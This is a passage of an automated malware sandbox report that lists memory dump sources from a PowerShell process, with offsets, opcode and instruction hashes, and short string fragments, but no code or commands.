                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f81169af2b91b02527a833ba92e4847671009606a6bc1f1fd52af4403dd334cd
                                    • Instruction ID: f8936ec2dc207422b4f99f5d5b0cdc7ab9055557c0f11af3cdc3771cc9647e63
                                    • Opcode Fuzzy Hash: f81169af2b91b02527a833ba92e4847671009606a6bc1f1fd52af4403dd334cd
                                    • Instruction Fuzzy Hash: 74413F316002549FDB14DBA4D998FAEBBF2FF88755F1840ACE806AB7A0CB719C45CB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2012e158ad1cd6fea420e9d45960d09ad0f8b54d82927a77993300c9081587d1
                                    • Instruction ID: 28d507ea8299e2f381ae50b5e6c166ddad47e18767e17d2616f6c028298d09c1
                                    • Opcode Fuzzy Hash: 2012e158ad1cd6fea420e9d45960d09ad0f8b54d82927a77993300c9081587d1
                                    • Instruction Fuzzy Hash: 2231E4B1F00304DFDBA4CE658541ABA77A2AF8824CF1A9469D9019F361FB35DC43C7A1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 68c7bbc14810a2152993fffd70eab6f73bb6daf773aae04bf3d19c743e0dc7f6
                                    • Instruction ID: 3ec231c37821b6b680448e22358cde5254f543fd0d171f10e3ded0e49be50508
                                    • Opcode Fuzzy Hash: 68c7bbc14810a2152993fffd70eab6f73bb6daf773aae04bf3d19c743e0dc7f6
                                    • Instruction Fuzzy Hash: 0D31F2B5A043859FCB02CF58C894A99BBB1FF59310B1541DAD844EB352D335EC05CBA1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ccaa28c407c565f61f6bc6207a3b2b5ae366c92aeb08f326b4d7087f2cc02870
                                    • Instruction ID: 3d0972b8d221f90ac2646da29425fc9332e6b7f799a2c9aedced5e16c1f6d8cd
                                    • Opcode Fuzzy Hash: ccaa28c407c565f61f6bc6207a3b2b5ae366c92aeb08f326b4d7087f2cc02870
                                    • Instruction Fuzzy Hash: 49319274A012599BDB26CF68C98169EB7F2FF45301F5441A9EC01AB741EB70EC8ACB90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b2d9a2d2676faacd8afdfc57e18507218e6baf8fb77603faae26ef84933a40ce
                                    • Instruction ID: 50725dcdd4976e487d04262a152de4b39558c173575bba6c22a1e00a3d058a7b
                                    • Opcode Fuzzy Hash: b2d9a2d2676faacd8afdfc57e18507218e6baf8fb77603faae26ef84933a40ce
                                    • Instruction Fuzzy Hash: 8E21C571E11349ABCF15CF64D8416DFBBF1EF45301F5045AAEC01BB641EB70984A8B90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76422788eb0a4b179a9f486f4f041bda4430667d2e11815fab43a752af823749
                                    • Instruction ID: 0518c67f2a4b8659f64a6d7b8c02161b77c20081e5ad6332e8781f8d0eb19398
                                    • Opcode Fuzzy Hash: 76422788eb0a4b179a9f486f4f041bda4430667d2e11815fab43a752af823749
                                    • Instruction Fuzzy Hash: 6521F874A00609DFDB04CF89C594AAAFBF1FF48310B1585A9E909A7751D735EC51CBA0
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e4fa49a32f1f65e78c82ed64936de79a2525c3b6e5902702003dd52418799596
                                    • Instruction ID: 1314082df31d01d2681bbb00f81fd65f41f4b79ed20a13b522e76dbcd42b5b0b
                                    • Opcode Fuzzy Hash: e4fa49a32f1f65e78c82ed64936de79a2525c3b6e5902702003dd52418799596
                                    • Instruction Fuzzy Hash: 151148716053409FC722572CD9116AFBBE2DF81316B640AFED852D7A51DB34980EC7D0
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c4a953695d0e0ce097b2d0c0245b038f53e74763d74153008b76b5b61f439c6
                                    • Instruction ID: ca1b3b02eb13773d88a7ee74c922c7e970f11ed0acca4d5dc0547ef62d914943
                                    • Opcode Fuzzy Hash: 4c4a953695d0e0ce097b2d0c0245b038f53e74763d74153008b76b5b61f439c6
                                    • Instruction Fuzzy Hash: C6014F78A002149FDB04DB98C9906EDF7B5FF8D300B248199D85A97361CA36EC078B50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080662428.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_abd000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8f9678647dccd5b60e860da708b312c718f8ffac5fad6d6fb86fc47655fd2ee9
                                    • Instruction ID: 656ae83b923676d121e97ac07779e13989c13aafa670d8383726c5a4fb4e9022
                                    • Opcode Fuzzy Hash: 8f9678647dccd5b60e860da708b312c718f8ffac5fad6d6fb86fc47655fd2ee9
                                    • Instruction Fuzzy Hash: 1301F271405340AAE7206B25CD84BA7FFECEF41364F18C02AED0A4B243D279D942CAB2
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 31fe094dbf94956bd52d323908e21b76bd05f22463083f79fb61a35d785bf4d8
                                    • Instruction ID: a29114e27df0d5bb0d8d0c9db607ae0d9784f22f71e93814d8d33892dbfce8a5
                                    • Opcode Fuzzy Hash: 31fe094dbf94956bd52d323908e21b76bd05f22463083f79fb61a35d785bf4d8
                                    • Instruction Fuzzy Hash: 9401E4B9E0020A9FC741DF68D485A9EBBF4FF08310F5041A9EA09EB362D730A955CBD1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080662428.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_abd000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1815b0daecca08de4db080823d08e23dbc22f36e88608ac30eaa102d652b9032
                                    • Instruction ID: 0af221e76229be3c817c71873e67c914ee0202aa50ce63e2ff8350e3328b12a4
                                    • Opcode Fuzzy Hash: 1815b0daecca08de4db080823d08e23dbc22f36e88608ac30eaa102d652b9032
                                    • Instruction Fuzzy Hash: 20F0AF72405240AEE7108B16C884BA2FFDCEB41324F18C05AED591A282C2799845CAB1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ee5de7726743ef38818e8d6ba9d5f3b39b57807841d46b667fd672b70c0d7dc
                                    • Instruction ID: ec035e5fa5dbf2cab8f7673a847225d400fe1bada1a1ab1409df0a642f501a3f
                                    • Opcode Fuzzy Hash: 1ee5de7726743ef38818e8d6ba9d5f3b39b57807841d46b667fd672b70c0d7dc
                                    • Instruction Fuzzy Hash: C6F0B432A003009F83556B6CA44911BBBD6EEC43923644AF9D847C7700DB31EC0ECBE1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62ae6ce3df8146fb9707ebda4bfd23c9720257ec619d3e030adc36db0d04ccb1
                                    • Instruction ID: 002dfe864e1cfb04bbc6622bbf506b8b5c44d635831b3e2d64ad4aefa9f9ceb9
                                    • Opcode Fuzzy Hash: 62ae6ce3df8146fb9707ebda4bfd23c9720257ec619d3e030adc36db0d04ccb1
                                    • Instruction Fuzzy Hash: 1FF097B4E0420ACFC780DF68C485AAEBBF4BF49310F505199D909EB321D631A945CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8a87715feeda87e31dc92cdcdc9f498a61b6c232aa1eb7e710a94cdb7c7091e9
                                    • Instruction ID: 1b1105bfcac39a27232a45f5439000fe603d0c3665bcd8f0ea70c5bc78e25a23
                                    • Opcode Fuzzy Hash: 8a87715feeda87e31dc92cdcdc9f498a61b6c232aa1eb7e710a94cdb7c7091e9
                                    • Instruction Fuzzy Hash: 1BF0393060A381DFD3528B50C854A21BBB2EB93208F19D0DED585CF1ABC736988BCB52

                                    Non-executed Functions

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r$tP;r$tP;r$$;r$(Ar$(Ar$(Ar$(Ar
                                    • API String ID: 0-1290985801
                                    • Opcode ID: 261430da00639eefd3e0b73300b7b14a12b8f8f2d6273a5dfd3fd8fcc21d96f0
                                    • Instruction ID: c1cfb3af8f2b230e7f2e8c80f810a01c96c680d4e1651f5ddfae65bd709def53
                                    • Opcode Fuzzy Hash: 261430da00639eefd3e0b73300b7b14a12b8f8f2d6273a5dfd3fd8fcc21d96f0
                                    • Instruction Fuzzy Hash: 3BA1E934B103159FDBA4DF68C508BAEB7A6EF84354F249469E905AF381DB31DC42C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$TQ@r$TQ@r$TQ@r$tP;r$tP;r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-3937178252
                                    • Opcode ID: c085c78fa3a986c786e026e77f96a7898859ea43c36109e5e883ab6340630fe3
                                    • Instruction ID: b4aa985b139dde53c681e36e3228d620502484c7c6bc58718a9f69b941baf469
                                    • Opcode Fuzzy Hash: c085c78fa3a986c786e026e77f96a7898859ea43c36109e5e883ab6340630fe3
                                    • Instruction Fuzzy Hash: 4D81C331B00305DFEBA99F58C50C7BA77A6AF84318F249569E8069F690CB36DC47C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r$t~Nr$$;r$$;r$$;r$$;r
                                    • API String ID: 0-1020809138
                                    • Opcode ID: 9a743c4a0b9704afe526325c7c186412df9af8b761531574537f984b9e737628
                                    • Instruction ID: 0908739831b29ca0222bf3b1600d80fd1c275370aa49d6a746dfa2c34844997a
                                    • Opcode Fuzzy Hash: 9a743c4a0b9704afe526325c7c186412df9af8b761531574537f984b9e737628
                                    • Instruction Fuzzy Hash: DFB13931F003059FEBA59B6985007AAB7E6AFC5214F24947AD605DF291DB32CD43C7E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$d%Ar$d%Ar$d%Ar$d%Ar$tP;r$tP;r$$;r
                                    • API String ID: 0-3149113169
                                    • Opcode ID: 22d82d79b4970f10140e3ecae47f4e493fc9cfd8cd1186c6bed87c3c8b0be30d
                                    • Instruction ID: b2995a00ec4883f6f325dbfa629443bff287722cfef3c1dd3aa11e194079320e
                                    • Opcode Fuzzy Hash: 22d82d79b4970f10140e3ecae47f4e493fc9cfd8cd1186c6bed87c3c8b0be30d
                                    • Instruction Fuzzy Hash: 7271C630F00315DFDBA49E64CD14BAAB7A6AFC8354F249169E8059B391DB31DD42CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-1150055375
                                    • Opcode ID: cdb2e472a3bd1f004e2e65413545373aee366c61c7c5477226a95224b28795c4
                                    • Instruction ID: 63c73bc431b56539d87bd39a39d28cfdb2837932c0688cffc061105fb8631785
                                    • Opcode Fuzzy Hash: cdb2e472a3bd1f004e2e65413545373aee366c61c7c5477226a95224b28795c4
                                    • Instruction Fuzzy Hash: B3F16E35B04341DFDB949F69C9507BABBA6EFC5214F2484BAE805CF241DB36D806C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-1150055375
                                    • Opcode ID: a274e774be40f44327152e00a564f097a5cee6002beead43f432bbbaf80f6395
                                    • Instruction ID: 4025da974fb5c8312630910e280813d5642ff994aabfbbcf6e7220d27db2932b
                                    • Opcode Fuzzy Hash: a274e774be40f44327152e00a564f097a5cee6002beead43f432bbbaf80f6395
                                    • Instruction Fuzzy Hash: 29412839B00745EFEBA84E19D844B6777A9AF82225F24947AE405CBAC1DB35C843C793
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r$XR@r$x.k$-k
                                    • API String ID: 0-2177826503
                                    • Opcode ID: 60f1c65829a91a4dc4069a2fbe0c766c030194e8bc32910e52d62f81095a422e
                                    • Instruction ID: 4bbb5908f023f0bf5ce6879e7100098226b15ae45d002f31f7667ca2cfdc892c
                                    • Opcode Fuzzy Hash: 60f1c65829a91a4dc4069a2fbe0c766c030194e8bc32910e52d62f81095a422e
                                    • Instruction Fuzzy Hash: 48F1C434E003049FDB64DB54C955BAEB7B6AF88318F248529D4066FB95CB36EC43CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r$tP;r$tP;r$$;r
                                    • API String ID: 0-3094404260
                                    • Opcode ID: 99ca5239e94f342f33b32af0a744c69c68559631ea0d38c1f3dd13d103682e7c
                                    • Instruction ID: e5ef5e8ff851fee1b47d855dcd58557427626584b19f2ab1c1bbedce2c50c21b
                                    • Opcode Fuzzy Hash: 99ca5239e94f342f33b32af0a744c69c68559631ea0d38c1f3dd13d103682e7c
                                    • Instruction Fuzzy Hash: E8B13A31F00345DFDBA49BACD4047ABBBB6AFC5214F24907AD515CB291DA32CA43C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r$$;r$$;r$$;r
                                    • API String ID: 0-1141978700
                                    • Opcode ID: 7e7e6abe3d352c3bfb823276177cc8d1fbd3df03268750de21b18c4312433cb2
                                    • Instruction ID: 47f404e6dad6ca4f48206f76f07961cb66ddc58633bfc79ad9caedbc640b0578
                                    • Opcode Fuzzy Hash: 7e7e6abe3d352c3bfb823276177cc8d1fbd3df03268750de21b18c4312433cb2
                                    • Instruction Fuzzy Hash: 0E815A32B043449FD7A49A6CD5017AABBA6AFC5214F24857AD446CB391DB32CE43C7E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$tP;r$tP;r$$;r$(Ar$(Ar$(Ar
                                    • API String ID: 0-2953425239
                                    • Opcode ID: 7d8a26fc10e6ed247a6e9d1db7193a403e3fb0d1438849c48d778f43e2ba734b
                                    • Instruction ID: ff6e1810d6bd5261f267a6ce53dee0058f58952204d567b87123fa0f1e75ca83
                                    • Opcode Fuzzy Hash: 7d8a26fc10e6ed247a6e9d1db7193a403e3fb0d1438849c48d778f43e2ba734b
                                    • Instruction Fuzzy Hash: C971E834B10311DFDBA4CF18C548BAAB7E2EF84354F19919AE905AF291D731DD42CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$TQ@r$TQ@r$tP;r$$;r$$;r$$;r
                                    • API String ID: 0-2253605028
                                    • Opcode ID: 13ac03a4fae5456d25e549de89e09a85edbf107c07a30c51ab7c44fd4b065c3a
                                    • Instruction ID: 76dfc33da978a1033c7038824c9c66d54ba45aaef9c0fa9ccb0854f94220b5ed
                                    • Opcode Fuzzy Hash: 13ac03a4fae5456d25e549de89e09a85edbf107c07a30c51ab7c44fd4b065c3a
                                    • Instruction Fuzzy Hash: 1251B631A00305DFDBA4CF05C60CBBA73A1AF44319F58A1A6E8059F6A1C736DD87CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tk$4';r$4';r$4';r$4';r$DUk
                                    • API String ID: 0-1327216166
                                    • Opcode ID: f608ee63ad62513a3cfee929aaa636abb0e9aeb429c4e7138ae8ad10d0aac290
                                    • Instruction ID: 78f9a16469463c326ecfd17deff232f0cd4513383ddee3f8e08d4da59740afae
                                    • Opcode Fuzzy Hash: f608ee63ad62513a3cfee929aaa636abb0e9aeb429c4e7138ae8ad10d0aac290
                                    • Instruction Fuzzy Hash: 3AD108B5F00304CFDB949F69D8447AAB7E6AFC9214B2590BAD505CF255FB32C842CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-4098155347
                                    • Opcode ID: 581860d0c4a3d8e622d61a53097f38baba4713a3ce5befb9b17dbdc1f9df430b
                                    • Instruction ID: b2d558d5fdfa5c846b50e45f77406f3dcf8d55fdc4eb6dc2df47fab98d178711
                                    • Opcode Fuzzy Hash: 581860d0c4a3d8e622d61a53097f38baba4713a3ce5befb9b17dbdc1f9df430b
                                    • Instruction Fuzzy Hash: C3614731B04358DFDB949F68DC087AABBA9AF81325F24D07AE445CB641CB36D843C791
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$d%Ar$d%Ar$d%Ar$tP;r$$;r
                                    • API String ID: 0-2493341346
                                    • Opcode ID: b1bcfed1742b7ff61597b54891f2f8f8b7dbf7253c058c5eaf7dd3d671fd5b83
                                    • Instruction ID: c5265a1d74088aa790d7d64370dab5b2c34ae4eea0c5586b9ea26796239598cd
                                    • Opcode Fuzzy Hash: b1bcfed1742b7ff61597b54891f2f8f8b7dbf7253c058c5eaf7dd3d671fd5b83
                                    • Instruction Fuzzy Hash: 1351A330F10305DFDBA4CE14CD44BAAF7A6AF88254F259195E805AF291DB32DD46CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r$$k
                                    • API String ID: 0-1503287806
                                    • Opcode ID: 90d52f6754b4f7aa8c71f9e7bd89da2ff236ce2d20c0f56465c2de8158035685
                                    • Instruction ID: 5a4c2204cf205372cb02f4fc85aa6288193a2b6f487b7ef4d221602010f8bfbf
                                    • Opcode Fuzzy Hash: 90d52f6754b4f7aa8c71f9e7bd89da2ff236ce2d20c0f56465c2de8158035685
                                    • Instruction Fuzzy Hash: C6813B31F043519FD7A45AAEC8057BBBBA6AFC5214F14807AD506CB281DB72CA43C7E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XR@r$XR@r$tP;r$tP;r$$;r
                                    • API String ID: 0-2935172430
                                    • Opcode ID: 20a55abee783a1a59ebef450353942e5e0dd8ddd1c331c40b55a8f2379c779e1
                                    • Instruction ID: 72271386326bc5637dcbddc3d4e3a000e1ba4708f55f82743be87d58549c2e5d
                                    • Opcode Fuzzy Hash: 20a55abee783a1a59ebef450353942e5e0dd8ddd1c331c40b55a8f2379c779e1
                                    • Instruction Fuzzy Hash: E851C431B003119FE754DB68D944BAAB7E6AFC8354F248069E9029F382DB32DC42C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r
                                    • API String ID: 0-3267477724
                                    • Opcode ID: 74776cf84f125793ab46633dd1500f283a357efa77d3eb3fb43c367440b9dfad
                                    • Instruction ID: 64f6f60f1701d74c1cd6f5ee12e44805896e0de66287d4cf2da0d3e42321c411
                                    • Opcode Fuzzy Hash: 74776cf84f125793ab46633dd1500f283a357efa77d3eb3fb43c367440b9dfad
                                    • Instruction Fuzzy Hash: F2410935B00315DFDBA85A29D5047BAB7969FC6215B24906AD8028F691DF32CC43CFA3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r
                                    • API String ID: 0-3267477724
                                    • Opcode ID: 1d6bcf68a9edb89c711e3d2c94c3a2dc76e33d49d2e64e1affa2930fb00ae7bd
                                    • Instruction ID: 8e4bda2210d5efd7a416598cf56071b30edaf7ba44e29f601926f37d98d7cf75
                                    • Opcode Fuzzy Hash: 1d6bcf68a9edb89c711e3d2c94c3a2dc76e33d49d2e64e1affa2930fb00ae7bd
                                    • Instruction Fuzzy Hash: 67412635F00305CFEBA45B6989087BAB7E9AF84254F24917AD405CF241EF32C947C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$tP;r$$;r$$;r$$;r
                                    • API String ID: 0-4019525536
                                    • Opcode ID: e549437f87fff5e147793be630c5748a74f4d4933af0fce458a3087cfca744ad
                                    • Instruction ID: d014634a16a3699b2d66507bad518334df835af21704ba529cb6779bf2716136
                                    • Opcode Fuzzy Hash: e549437f87fff5e147793be630c5748a74f4d4933af0fce458a3087cfca744ad
                                    • Instruction Fuzzy Hash: 5331C830E10300EFEBA4CE55CE40BA977A1AF44325F18E1B5D5255F292C736D842CBE1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-3614991455
                                    • Opcode ID: 513193d4f15612098b492719faf8bb6b6186b5fc1ee1f9db7c2745293914b0ab
                                    • Instruction ID: 3961c3ccc42fbc1a4869784ecc70ca1a1b37bb96e73805f76930adf788f42411
                                    • Opcode Fuzzy Hash: 513193d4f15612098b492719faf8bb6b6186b5fc1ee1f9db7c2745293914b0ab
                                    • Instruction Fuzzy Hash: 6731D779A04744FFDBB54E09C940AB37BB4AF43259F1861A6E8048B5D1C735C986CBA3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$d%Ar$d%Ar$d%Ar$tP;r
